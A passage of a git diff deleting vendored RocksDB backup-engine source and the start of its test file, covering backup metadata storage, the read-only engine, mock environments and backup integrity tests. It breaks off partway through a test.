-          strtoul(line.data(), nullptr, 10));
-      if (line != rocksdb::ToString(checksum_value)) {
-        return Status::Corruption("Invalid checksum value for " + filename +
-                                  " in " + meta_filename_);
-      }
-    } else {
-      return Status::Corruption("Unknown checksum type for " + filename +
-                                " in " + meta_filename_);
-    }
-
-    files.emplace_back(new FileInfo(filename, size, checksum_value));
-  }
-
-  if (s.ok() && data.size() > 0) {
-    // file has to be read completely. if not, we count it as corruption
-    s = Status::Corruption("Tailing data in backup meta file in " +
-                           meta_filename_);
-  }
-
-  if (s.ok()) {
-    files_.reserve(files.size());
-    for (const auto& file_info : files) {
-      s = AddFile(file_info);
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-
-  return s;
-}
-
-Status BackupEngineImpl::BackupMeta::StoreToFile(bool sync) {
-  Status s;
-  unique_ptr<WritableFile> backup_meta_file;
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  env_options.use_direct_writes = false;
-  s = env_->NewWritableFile(meta_filename_ + ".tmp", &backup_meta_file,
-                            env_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  unique_ptr<char[]> buf(new char[max_backup_meta_file_size_]);
-  size_t len = 0, buf_size = max_backup_meta_file_size_;
-  len += snprintf(buf.get(), buf_size, "%" PRId64 "\n", timestamp_);
-  len += snprintf(buf.get() + len, buf_size - len, "%" PRIu64 "\n",
-                  sequence_number_);
-  if (!app_metadata_.empty()) {
-    std::string hex_encoded_metadata =
-        Slice(app_metadata_).ToString(/* hex */ true);
-    if (hex_encoded_metadata.size() + kMetaDataPrefix.size() + 1 >
-        buf_size - len) {
-      return Status::Corruption("Buffer too small to fit backup metadata");
-    }
-    memcpy(buf.get() + len, kMetaDataPrefix.data(), kMetaDataPrefix.size());
-    len += kMetaDataPrefix.size();
-    memcpy(buf.get() + len, hex_encoded_metadata.data(),
-           hex_encoded_metadata.size());
-    len += hex_encoded_metadata.size();
-    buf[len++] = '\n';
-  }
-  len += snprintf(buf.get() + len, buf_size - len, "%" ROCKSDB_PRIszt "\n",
-                  files_.size());
-  for (const auto& file : files_) {
-    // use crc32 for now, switch to something else if needed
-    len += snprintf(buf.get() + len, buf_size - len, "%s crc32 %u\n",
-                    file->filename.c_str(), file->checksum_value);
-  }
-
-  s = backup_meta_file->Append(Slice(buf.get(), len));
-  if (s.ok() && sync) {
-    s = backup_meta_file->Sync();
-  }
-  if (s.ok()) {
-    s = backup_meta_file->Close();
-  }
-  if (s.ok()) {
-    s = env_->RenameFile(meta_filename_ + ".tmp", meta_filename_);
-  }
-  return s;
-}
-
-// -------- BackupEngineReadOnlyImpl ---------
-class BackupEngineReadOnlyImpl : public BackupEngineReadOnly {
- public:
-  BackupEngineReadOnlyImpl(Env* db_env, const BackupableDBOptions& options)
-      : backup_engine_(new BackupEngineImpl(db_env, options, true)) {}
-
-  virtual ~BackupEngineReadOnlyImpl() {}
-
-  // The returned BackupInfos are in chronological order, which means the
-  // latest backup comes last.
-  virtual void GetBackupInfo(std::vector<BackupInfo>* backup_info) override {
-    backup_engine_->GetBackupInfo(backup_info);
-  }
-
-  virtual void GetCorruptedBackups(
-      std::vector<BackupID>* corrupt_backup_ids) override {
-    backup_engine_->GetCorruptedBackups(corrupt_backup_ids);
-  }
-
-  virtual Status RestoreDBFromBackup(
-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override {
-    return backup_engine_->RestoreDBFromBackup(backup_id, db_dir, wal_dir,
-                                               restore_options);
-  }
-
-  virtual Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) override {
-    return backup_engine_->RestoreDBFromLatestBackup(db_dir, wal_dir,
-                                                     restore_options);
-  }
-
-  virtual Status VerifyBackup(BackupID backup_id) override {
-    return backup_engine_->VerifyBackup(backup_id);
-  }
-
-  Status Initialize() { return backup_engine_->Initialize(); }
-
- private:
-  std::unique_ptr<BackupEngineImpl> backup_engine_;
-};
-
-Status BackupEngineReadOnly::Open(Env* env, const BackupableDBOptions& options,
-                                  BackupEngineReadOnly** backup_engine_ptr) {
-  if (options.destroy_old_data) {
-    return Status::InvalidArgument(
-        "Can't destroy old data with ReadOnly BackupEngine");
-  }
-  std::unique_ptr<BackupEngineReadOnlyImpl> backup_engine(
-      new BackupEngineReadOnlyImpl(env, options));
-  auto s = backup_engine->Initialize();
-  if (!s.ok()) {
-    *backup_engine_ptr = nullptr;
-    return s;
-  }
-  *backup_engine_ptr = backup_engine.release();
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/backupable/backupable_db_test.cc b/thirdparty/rocksdb/utilities/backupable/backupable_db_test.cc
deleted file mode 100644
index be20a8d..0000000
--- a/thirdparty/rocksdb/utilities/backupable/backupable_db_test.cc
+++ /dev/null
@@ -1,1548 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#if !defined(ROCKSDB_LITE) && !defined(OS_WIN)
-
-#include <algorithm>
-#include <string>
-
-#include "db/db_impl.h"
-#include "env/env_chroot.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/options_util.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-namespace {
-
-using std::unique_ptr;
-
-class DummyDB : public StackableDB {
- public:
-  /* implicit */
-  DummyDB(const Options& options, const std::string& dbname)
-     : StackableDB(nullptr), options_(options), dbname_(dbname),
-       deletions_enabled_(true), sequence_number_(0) {}
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override {
-    return ++sequence_number_;
-  }
-
-  virtual const std::string& GetName() const override {
-    return dbname_;
-  }
-
-  virtual Env* GetEnv() const override {
-    return options_.env;
-  }
-
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
-    return options_;
-  }
-
-  virtual DBOptions GetDBOptions() const override {
-    return DBOptions(options_);
-  }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    EXPECT_TRUE(!deletions_enabled_);
-    deletions_enabled_ = true;
-    return Status::OK();
-  }
-
-  virtual Status DisableFileDeletions() override {
-    EXPECT_TRUE(deletions_enabled_);
-    deletions_enabled_ = false;
-    return Status::OK();
-  }
-
-  virtual Status GetLiveFiles(std::vector<std::string>& vec, uint64_t* mfs,
-                              bool flush_memtable = true) override {
-    EXPECT_TRUE(!deletions_enabled_);
-    vec = live_files_;
-    *mfs = 100;
-    return Status::OK();
-  }
-
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const override {
-    return nullptr;
-  }
-
-  class DummyLogFile : public LogFile {
-   public:
-    /* implicit */
-     DummyLogFile(const std::string& path, bool alive = true)
-         : path_(path), alive_(alive) {}
-
-    virtual std::string PathName() const override {
-      return path_;
-    }
-
-    virtual uint64_t LogNumber() const override {
-      // what business do you have calling this method?
-      ADD_FAILURE();
-      return 0;
-    }
-
-    virtual WalFileType Type() const override {
-      return alive_ ? kAliveLogFile : kArchivedLogFile;
-    }
-
-    virtual SequenceNumber StartSequence() const override {
-      // this seqnum guarantees the dummy file will be included in the backup
-      // as long as it is alive.
-      return kMaxSequenceNumber;
-    }
-
-    virtual uint64_t SizeFileBytes() const override {
-      return 0;
-    }
-
-   private:
-    std::string path_;
-    bool alive_;
-  }; // DummyLogFile
-
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override {
-    EXPECT_TRUE(!deletions_enabled_);
-    files.resize(wal_files_.size());
-    for (size_t i = 0; i < files.size(); ++i) {
-      files[i].reset(
-          new DummyLogFile(wal_files_[i].first, wal_files_[i].second));
-    }
-    return Status::OK();
-  }
-
-  // To avoid FlushWAL called on stacked db which is nullptr
-  virtual Status FlushWAL(bool sync) override { return Status::OK(); }
-
-  std::vector<std::string> live_files_;
-  // pair<filename, alive?>
-  std::vector<std::pair<std::string, bool>> wal_files_;
- private:
-  Options options_;
-  std::string dbname_;
-  bool deletions_enabled_;
-  mutable SequenceNumber sequence_number_;
-}; // DummyDB
-
-class TestEnv : public EnvWrapper {
- public:
-  explicit TestEnv(Env* t) : EnvWrapper(t) {}
-
-  class DummySequentialFile : public SequentialFile {
-   public:
-    explicit DummySequentialFile(bool fail_reads)
-        : SequentialFile(), rnd_(5), fail_reads_(fail_reads) {}
-    virtual Status Read(size_t n, Slice* result, char* scratch) override {
-      if (fail_reads_) {
-        return Status::IOError();
-      }
-      size_t read_size = (n > size_left) ? size_left : n;
-      for (size_t i = 0; i < read_size; ++i) {
-        scratch[i] = rnd_.Next() & 255;
-      }
-      *result = Slice(scratch, read_size);
-      size_left -= read_size;
-      return Status::OK();
-    }
-
-    virtual Status Skip(uint64_t n) override {
-      size_left = (n > size_left) ? size_left - n : 0;
-      return Status::OK();
-    }
-   private:
-    size_t size_left = 200;
-    Random rnd_;
-    bool fail_reads_;
-  };
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override {
-    MutexLock l(&mutex_);
-    if (dummy_sequential_file_) {
-      r->reset(
-          new TestEnv::DummySequentialFile(dummy_sequential_file_fail_reads_));
-      return Status::OK();
-    } else {
-      return EnvWrapper::NewSequentialFile(f, r, options);
-    }
-  }
-
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override {
-    MutexLock l(&mutex_);
-    written_files_.push_back(f);
-    if (limit_written_files_ <= 0) {
-      return Status::NotSupported("Sorry, can't do this");
-    }
-    limit_written_files_--;
-    return EnvWrapper::NewWritableFile(f, r, options);
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    MutexLock l(&mutex_);
-    if (fail_delete_files_) {
-      return Status::IOError();
-    }
-    EXPECT_GT(limit_delete_files_, 0U);
-    limit_delete_files_--;
-    return EnvWrapper::DeleteFile(fname);
-  }
-
-  virtual Status DeleteDir(const std::string& dirname) override {
-    MutexLock l(&mutex_);
-    if (fail_delete_files_) {
-      return Status::IOError();
-    }
-    return EnvWrapper::DeleteDir(dirname);
-  }
-
-  void AssertWrittenFiles(std::vector<std::string>& should_have_written) {
-    MutexLock l(&mutex_);
-    std::sort(should_have_written.begin(), should_have_written.end());
-    std::sort(written_files_.begin(), written_files_.end());
-
-    ASSERT_EQ(should_have_written, written_files_);
-  }
-
-  void ClearWrittenFiles() {
-    MutexLock l(&mutex_);
-    written_files_.clear();
-  }
-
-  void SetLimitWrittenFiles(uint64_t limit) {
-    MutexLock l(&mutex_);
-    limit_written_files_ = limit;
-  }
-
-  void SetLimitDeleteFiles(uint64_t limit) {
-    MutexLock l(&mutex_);
-    limit_delete_files_ = limit;
-  }
-
-  void SetDeleteFileFailure(bool fail) {
-    MutexLock l(&mutex_);
-    fail_delete_files_ = fail;
-  }
-
-  void SetDummySequentialFile(bool dummy_sequential_file) {
-    MutexLock l(&mutex_);
-    dummy_sequential_file_ = dummy_sequential_file;
-  }
-  void SetDummySequentialFileFailReads(bool dummy_sequential_file_fail_reads) {
-    MutexLock l(&mutex_);
-    dummy_sequential_file_fail_reads_ = dummy_sequential_file_fail_reads;
-  }
-
-  void SetGetChildrenFailure(bool fail) { get_children_failure_ = fail; }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    if (get_children_failure_) {
-      return Status::IOError("SimulatedFailure");
-    }
-    return EnvWrapper::GetChildren(dir, r);
-  }
-
-  // Some test cases do not actually create the test files (e.g., see
-  // DummyDB::live_files_) - for those cases, we mock those files' attributes
-  // so CreateNewBackup() can get their attributes.
-  void SetFilenamesForMockedAttrs(const std::vector<std::string>& filenames) {
-    filenames_for_mocked_attrs_ = filenames;
-  }
-  Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<Env::FileAttributes>* r) override {
-    if (filenames_for_mocked_attrs_.size() > 0) {
-      for (const auto& filename : filenames_for_mocked_attrs_) {
-        r->push_back({dir + filename, 10 /* size_bytes */});
-      }
-      return Status::OK();
-    }
-    return EnvWrapper::GetChildrenFileAttributes(dir, r);
-  }
-  Status GetFileSize(const std::string& path, uint64_t* size_bytes) override {
-    if (filenames_for_mocked_attrs_.size() > 0) {
-      auto fname = path.substr(path.find_last_of('/'));
-      auto filename_iter = std::find(filenames_for_mocked_attrs_.begin(),
-                                     filenames_for_mocked_attrs_.end(), fname);
-      if (filename_iter != filenames_for_mocked_attrs_.end()) {
-        *size_bytes = 10;
-        return Status::OK();
-      }
-      return Status::NotFound(fname);
-    }
-    return EnvWrapper::GetFileSize(path, size_bytes);
-  }
-
-  void SetCreateDirIfMissingFailure(bool fail) {
-    create_dir_if_missing_failure_ = fail;
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    if (create_dir_if_missing_failure_) {
-      return Status::IOError("SimulatedFailure");
-    }
-    return EnvWrapper::CreateDirIfMissing(d);
-  }
-
-  void SetNewDirectoryFailure(bool fail) { new_directory_failure_ = fail; }
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    if (new_directory_failure_) {
-      return Status::IOError("SimulatedFailure");
-    }
-    return EnvWrapper::NewDirectory(name, result);
-  }
-
- private:
-  port::Mutex mutex_;
-  bool dummy_sequential_file_ = false;
-  bool dummy_sequential_file_fail_reads_ = false;
-  std::vector<std::string> written_files_;
-  std::vector<std::string> filenames_for_mocked_attrs_;
-  uint64_t limit_written_files_ = 1000000;
-  uint64_t limit_delete_files_ = 1000000;
-  bool fail_delete_files_ = false;
-
-  bool get_children_failure_ = false;
-  bool create_dir_if_missing_failure_ = false;
-  bool new_directory_failure_ = false;
-};  // TestEnv
-
-class FileManager : public EnvWrapper {
- public:
-  explicit FileManager(Env* t) : EnvWrapper(t), rnd_(5) {}
-
-  Status DeleteRandomFileInDir(const std::string& dir) {
-    std::vector<std::string> children;
-    GetChildren(dir, &children);
-    if (children.size() <= 2) { // . and ..
-      return Status::NotFound("");
-    }
-    while (true) {
-      int i = rnd_.Next() % children.size();
-      if (children[i] != "." && children[i] != "..") {
-        return DeleteFile(dir + "/" + children[i]);
-      }
-    }
-    // should never get here
-    assert(false);
-    return Status::NotFound("");
-  }
-
-  Status AppendToRandomFileInDir(const std::string& dir,
-                                 const std::string& data) {
-    std::vector<std::string> children;
-    GetChildren(dir, &children);
-    if (children.size() <= 2) {
-      return Status::NotFound("");
-    }
-    while (true) {
-      int i = rnd_.Next() % children.size();
-      if (children[i] != "." && children[i] != "..") {
-        return WriteToFile(dir + "/" + children[i], data);
-      }
-    }
-    // should never get here
-    assert(false);
-    return Status::NotFound("");
-  }
-
-  Status CorruptFile(const std::string& fname, uint64_t bytes_to_corrupt) {
-    std::string file_contents;
-    Status s = ReadFileToString(this, fname, &file_contents);
-    if (!s.ok()) {
-      return s;
-    }
-    s = DeleteFile(fname);
-    if (!s.ok()) {
-      return s;
-    }
-
-    for (uint64_t i = 0; i < bytes_to_corrupt; ++i) {
-      std::string tmp;
-      test::RandomString(&rnd_, 1, &tmp);
-      file_contents[rnd_.Next() % file_contents.size()] = tmp[0];
-    }
-    return WriteToFile(fname, file_contents);
-  }
-
-  Status CorruptChecksum(const std::string& fname, bool appear_valid) {
-    std::string metadata;
-    Status s = ReadFileToString(this, fname, &metadata);
-    if (!s.ok()) {
-      return s;
-    }
-    s = DeleteFile(fname);
-    if (!s.ok()) {
-      return s;
-    }
-
-    auto pos = metadata.find("private");
-    if (pos == std::string::npos) {
-      return Status::Corruption("private file is expected");
-    }
-    pos = metadata.find(" crc32 ", pos + 6);
-    if (pos == std::string::npos) {
-      return Status::Corruption("checksum not found");
-    }
-
-    if (metadata.size() < pos + 7) {
-      return Status::Corruption("bad CRC32 checksum value");
-    }
-
-    if (appear_valid) {
-      if (metadata[pos + 8] == '\n') {
-        // single digit value, safe to insert one more digit
-        metadata.insert(pos + 8, 1, '0');
-      } else {
-        metadata.erase(pos + 8, 1);
-      }
-    } else {
-      metadata[pos + 7] = 'a';
-    }
-
-    return WriteToFile(fname, metadata);
-  }
-
-  Status WriteToFile(const std::string& fname, const std::string& data) {
-    unique_ptr<WritableFile> file;
-    EnvOptions env_options;
-    env_options.use_mmap_writes = false;
-    Status s = EnvWrapper::NewWritableFile(fname, &file, env_options);
-    if (!s.ok()) {
-      return s;
-    }
-    return file->Append(Slice(data));
-  }
-
- private:
-  Random rnd_;
-}; // FileManager
-
-// utility functions
-static size_t FillDB(DB* db, int from, int to) {
-  size_t bytes_written = 0;
-  for (int i = from; i < to; ++i) {
-    std::string key = "testkey" + ToString(i);
-    std::string value = "testvalue" + ToString(i);
-    bytes_written += key.size() + value.size();
-
-    EXPECT_OK(db->Put(WriteOptions(), Slice(key), Slice(value)));
-  }
-  return bytes_written;
-}
-
-static void AssertExists(DB* db, int from, int to) {
-  for (int i = from; i < to; ++i) {
-    std::string key = "testkey" + ToString(i);
-    std::string value;
-    Status s = db->Get(ReadOptions(), Slice(key), &value);
-    ASSERT_EQ(value, "testvalue" + ToString(i));
-  }
-}
-
-static void AssertEmpty(DB* db, int from, int to) {
-  for (int i = from; i < to; ++i) {
-    std::string key = "testkey" + ToString(i);
-    std::string value = "testvalue" + ToString(i);
-
-    Status s = db->Get(ReadOptions(), Slice(key), &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-class BackupableDBTest : public testing::Test {
- public:
-  BackupableDBTest() {
-    // set up files
-    std::string db_chroot = test::TmpDir() + "/backupable_db";
-    std::string backup_chroot = test::TmpDir() + "/backupable_db_backup";
-    Env::Default()->CreateDir(db_chroot);
-    Env::Default()->CreateDir(backup_chroot);
-    dbname_ = "/tempdb";
-    backupdir_ = "/tempbk";
-
-    // set up envs
-    db_chroot_env_.reset(NewChrootEnv(Env::Default(), db_chroot));
-    backup_chroot_env_.reset(NewChrootEnv(Env::Default(), backup_chroot));
-    test_db_env_.reset(new TestEnv(db_chroot_env_.get()));
-    test_backup_env_.reset(new TestEnv(backup_chroot_env_.get()));
-    file_manager_.reset(new FileManager(backup_chroot_env_.get()));
-
-    // set up db options
-    options_.create_if_missing = true;
-    options_.paranoid_checks = true;
-    options_.write_buffer_size = 1 << 17; // 128KB
-    options_.env = test_db_env_.get();
-    options_.wal_dir = dbname_;
-
-    // Create logger
-    DBOptions logger_options;
-    logger_options.env = db_chroot_env_.get();
-    CreateLoggerFromOptions(dbname_, logger_options, &logger_);
-
-    // set up backup db options
-    backupable_options_.reset(new BackupableDBOptions(
-        backupdir_, test_backup_env_.get(), true, logger_.get(), true));
-
-    // most tests will use multi-threaded backups
-    backupable_options_->max_background_operations = 7;
-
-    // delete old files in db
-    DestroyDB(dbname_, options_);
-  }
-
-  DB* OpenDB() {
-    DB* db;
-    EXPECT_OK(DB::Open(options_, dbname_, &db));
-    return db;
-  }
-
-  void OpenDBAndBackupEngineShareWithChecksum(
-      bool destroy_old_data = false, bool dummy = false,
-      bool share_table_files = true, bool share_with_checksums = false) {
-    backupable_options_->share_files_with_checksum = share_with_checksums;
-    OpenDBAndBackupEngine(destroy_old_data, dummy, share_with_checksums);
-  }
-
-  void OpenDBAndBackupEngine(bool destroy_old_data = false, bool dummy = false,
-                             bool share_table_files = true) {
-    // reset all the defaults
-    test_backup_env_->SetLimitWrittenFiles(1000000);
-    test_db_env_->SetLimitWrittenFiles(1000000);
-    test_db_env_->SetDummySequentialFile(dummy);
-
-    DB* db;
-    if (dummy) {
-      dummy_db_ = new DummyDB(options_, dbname_);
-      db = dummy_db_;
-    } else {
-      ASSERT_OK(DB::Open(options_, dbname_, &db));
-    }
-    db_.reset(db);
-    backupable_options_->destroy_old_data = destroy_old_data;
-    backupable_options_->share_table_files = share_table_files;
-    BackupEngine* backup_engine;
-    ASSERT_OK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                 &backup_engine));
-    backup_engine_.reset(backup_engine);
-  }
-
-  void CloseDBAndBackupEngine() {
-    db_.reset();
-    backup_engine_.reset();
-  }
-
-  void OpenBackupEngine() {
-    backupable_options_->destroy_old_data = false;
-    BackupEngine* backup_engine;
-    ASSERT_OK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                 &backup_engine));
-    backup_engine_.reset(backup_engine);
-  }
-
-  void CloseBackupEngine() { backup_engine_.reset(nullptr); }
-
-  // restores backup backup_id and asserts the existence of
-  // [start_exist, end_exist> and not-existence of
-  // [end_exist, end>
-  //
-  // if backup_id == 0, it means restore from latest
-  // if end == 0, don't check AssertEmpty
-  void AssertBackupConsistency(BackupID backup_id, uint32_t start_exist,
-                               uint32_t end_exist, uint32_t end = 0,
-                               bool keep_log_files = false) {
-    RestoreOptions restore_options(keep_log_files);
-    bool opened_backup_engine = false;
-    if (backup_engine_.get() == nullptr) {
-      opened_backup_engine = true;
-      OpenBackupEngine();
-    }
-    if (backup_id > 0) {
-      ASSERT_OK(backup_engine_->RestoreDBFromBackup(backup_id, dbname_, dbname_,
-                                                    restore_options));
-    } else {
-      ASSERT_OK(backup_engine_->RestoreDBFromLatestBackup(dbname_, dbname_,
-                                                          restore_options));
-    }
-    DB* db = OpenDB();
-    AssertExists(db, start_exist, end_exist);
-    if (end != 0) {
-      AssertEmpty(db, end_exist, end);
-    }
-    delete db;
-    if (opened_backup_engine) {
-      CloseBackupEngine();
-    }
-  }
-
-  void DeleteLogFiles() {
-    std::vector<std::string> delete_logs;
-    db_chroot_env_->GetChildren(dbname_, &delete_logs);
-    for (auto f : delete_logs) {
-      uint64_t number;
-      FileType type;
-      bool ok = ParseFileName(f, &number, &type);
-      if (ok && type == kLogFile) {
-        db_chroot_env_->DeleteFile(dbname_ + "/" + f);
-      }
-    }
-  }
-
-  // files
-  std::string dbname_;
-  std::string backupdir_;
-
-  // logger_ must be above backup_engine_ such that the engine's destructor,
-  // which uses a raw pointer to the logger, executes first.
-  std::shared_ptr<Logger> logger_;
-
-  // envs
-  unique_ptr<Env> db_chroot_env_;
-  unique_ptr<Env> backup_chroot_env_;
-  unique_ptr<TestEnv> test_db_env_;
-  unique_ptr<TestEnv> test_backup_env_;
-  unique_ptr<FileManager> file_manager_;
-
-  // all the dbs!
-  DummyDB* dummy_db_; // BackupableDB owns dummy_db_
-  unique_ptr<DB> db_;
-  unique_ptr<BackupEngine> backup_engine_;
-
-  // options
-  Options options_;
-
- protected:
-  unique_ptr<BackupableDBOptions> backupable_options_;
-}; // BackupableDBTest
-
-void AppendPath(const std::string& path, std::vector<std::string>& v) {
-  for (auto& f : v) {
-    f = path + f;
-  }
-}
-
-class BackupableDBTestWithParam : public BackupableDBTest,
-                                  public testing::WithParamInterface<bool> {
- public:
-  BackupableDBTestWithParam() {
-    backupable_options_->share_files_with_checksum = GetParam();
-  }
-};
-
-// This test verifies that the verifyBackup method correctly identifies
-// invalid backups
-TEST_P(BackupableDBTestWithParam, VerifyBackup) {
-  const int keys_iteration = 5000;
-  Random rnd(6);
-  Status s;
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  OpenDBAndBackupEngine();
-  // ---------- case 1. - valid backup -----------
-  ASSERT_TRUE(backup_engine_->VerifyBackup(1).ok());
-
-  // ---------- case 2. - delete a file -----------i
-  file_manager_->DeleteRandomFileInDir(backupdir_ + "/private/1");
-  ASSERT_TRUE(backup_engine_->VerifyBackup(1).IsNotFound());
-
-  // ---------- case 3. - corrupt a file -----------
-  std::string append_data = "Corrupting a random file";
-  file_manager_->AppendToRandomFileInDir(backupdir_ + "/private/2",
-                                         append_data);
-  ASSERT_TRUE(backup_engine_->VerifyBackup(2).IsCorruption());
-
-  // ---------- case 4. - invalid backup -----------
-  ASSERT_TRUE(backup_engine_->VerifyBackup(6).IsNotFound());
-  CloseDBAndBackupEngine();
-}
-
-// open DB, write, close DB, backup, restore, repeat
-TEST_P(BackupableDBTestWithParam, OfflineIntegrationTest) {
-  // has to be a big number, so that it triggers the memtable flush
-  const int keys_iteration = 5000;
-  const int max_key = keys_iteration * 4 + 10;
-  // first iter -- flush before backup
-  // second iter -- don't flush before backup
-  for (int iter = 0; iter < 2; ++iter) {
-    // delete old data
-    DestroyDB(dbname_, options_);
-    bool destroy_data = true;
-
-    // every iteration --
-    // 1. insert new data in the DB
-    // 2. backup the DB
-    // 3. destroy the db
-    // 4. restore the db, check everything is still there
-    for (int i = 0; i < 5; ++i) {
-      // in last iteration, put smaller amount of data,
-      int fill_up_to = std::min(keys_iteration * (i + 1), max_key);
-      // ---- insert new data and back up ----
-      OpenDBAndBackupEngine(destroy_data);
-      destroy_data = false;
-      FillDB(db_.get(), keys_iteration * i, fill_up_to);
-      ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), iter == 0));
-      CloseDBAndBackupEngine();
-      DestroyDB(dbname_, options_);
-
-      // ---- make sure it's empty ----
-      DB* db = OpenDB();
-      AssertEmpty(db, 0, fill_up_to);
-      delete db;
-
-      // ---- restore the DB ----
-      OpenBackupEngine();
-      if (i >= 3) {  // test purge old backups
-        // when i == 4, purge to only 1 backup
-        // when i == 3, purge to 2 backups
-        ASSERT_OK(backup_engine_->PurgeOldBackups(5 - i));
-      }
-      // ---- make sure the data is there ---
-      AssertBackupConsistency(0, 0, fill_up_to, max_key);
-      CloseBackupEngine();
-    }
-  }
-}
-
-// open DB, write, backup, write, backup, close, restore
-TEST_P(BackupableDBTestWithParam, OnlineIntegrationTest) {
-  // has to be a big number, so that it triggers the memtable flush
-  const int keys_iteration = 5000;
-  const int max_key = keys_iteration * 4 + 10;
-  Random rnd(7);
-  // delete old data
-  DestroyDB(dbname_, options_);
-
-  OpenDBAndBackupEngine(true);
-  // write some data, backup, repeat
-  for (int i = 0; i < 5; ++i) {
-    if (i == 4) {
-      // delete backup number 2, online delete!
-      ASSERT_OK(backup_engine_->DeleteBackup(2));
-    }
-    // in last iteration, put smaller amount of data,
-    // so that backups can share sst files
-    int fill_up_to = std::min(keys_iteration * (i + 1), max_key);
-    FillDB(db_.get(), keys_iteration * i, fill_up_to);
-    // we should get consistent results with flush_before_backup
-    // set to both true and false
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  }
-  // close and destroy
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-
-  // ---- make sure it's empty ----
-  DB* db = OpenDB();
-  AssertEmpty(db, 0, max_key);
-  delete db;
-
-  // ---- restore every backup and verify all the data is there ----
-  OpenBackupEngine();
-  for (int i = 1; i <= 5; ++i) {
-    if (i == 2) {
-      // we deleted backup 2
-      Status s = backup_engine_->RestoreDBFromBackup(2, dbname_, dbname_);
-      ASSERT_TRUE(!s.ok());
-    } else {
-      int fill_up_to = std::min(keys_iteration * i, max_key);
-      AssertBackupConsistency(i, 0, fill_up_to, max_key);
-    }
-  }
-
-  // delete some backups -- this should leave only backups 3 and 5 alive
-  ASSERT_OK(backup_engine_->DeleteBackup(4));
-  ASSERT_OK(backup_engine_->PurgeOldBackups(2));
-
-  std::vector<BackupInfo> backup_info;
-  backup_engine_->GetBackupInfo(&backup_info);
-  ASSERT_EQ(2UL, backup_info.size());
-
-  // check backup 3
-  AssertBackupConsistency(3, 0, 3 * keys_iteration, max_key);
-  // check backup 5
-  AssertBackupConsistency(5, 0, max_key);
-
-  CloseBackupEngine();
-}
-
-INSTANTIATE_TEST_CASE_P(BackupableDBTestWithParam, BackupableDBTestWithParam,
-                        ::testing::Bool());
-
-// this will make sure that backup does not copy the same file twice
-TEST_F(BackupableDBTest, NoDoubleCopy) {
-  OpenDBAndBackupEngine(true, true);
-
-  // should write 5 DB files + one meta file
-  test_backup_env_->SetLimitWrittenFiles(7);
-  test_backup_env_->ClearWrittenFiles();
-  test_db_env_->SetLimitWrittenFiles(0);
-  dummy_db_->live_files_ = {"/00010.sst", "/00011.sst", "/CURRENT",
-                            "/MANIFEST-01"};
-  dummy_db_->wal_files_ = {{"/00011.log", true}, {"/00012.log", false}};
-  test_db_env_->SetFilenamesForMockedAttrs(dummy_db_->live_files_);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-  std::vector<std::string> should_have_written = {
-      "/shared/00010.sst.tmp",    "/shared/00011.sst.tmp",
-      "/private/1.tmp/CURRENT",   "/private/1.tmp/MANIFEST-01",
-      "/private/1.tmp/00011.log", "/meta/1.tmp"};
-  AppendPath(backupdir_, should_have_written);
-  test_backup_env_->AssertWrittenFiles(should_have_written);
-
-  // should write 4 new DB files + one meta file
-  // should not write/copy 00010.sst, since it's already there!
-  test_backup_env_->SetLimitWrittenFiles(6);
-  test_backup_env_->ClearWrittenFiles();
-
-  dummy_db_->live_files_ = {"/00010.sst", "/00015.sst", "/CURRENT",
-                            "/MANIFEST-01"};
-  dummy_db_->wal_files_ = {{"/00011.log", true}, {"/00012.log", false}};
-  test_db_env_->SetFilenamesForMockedAttrs(dummy_db_->live_files_);
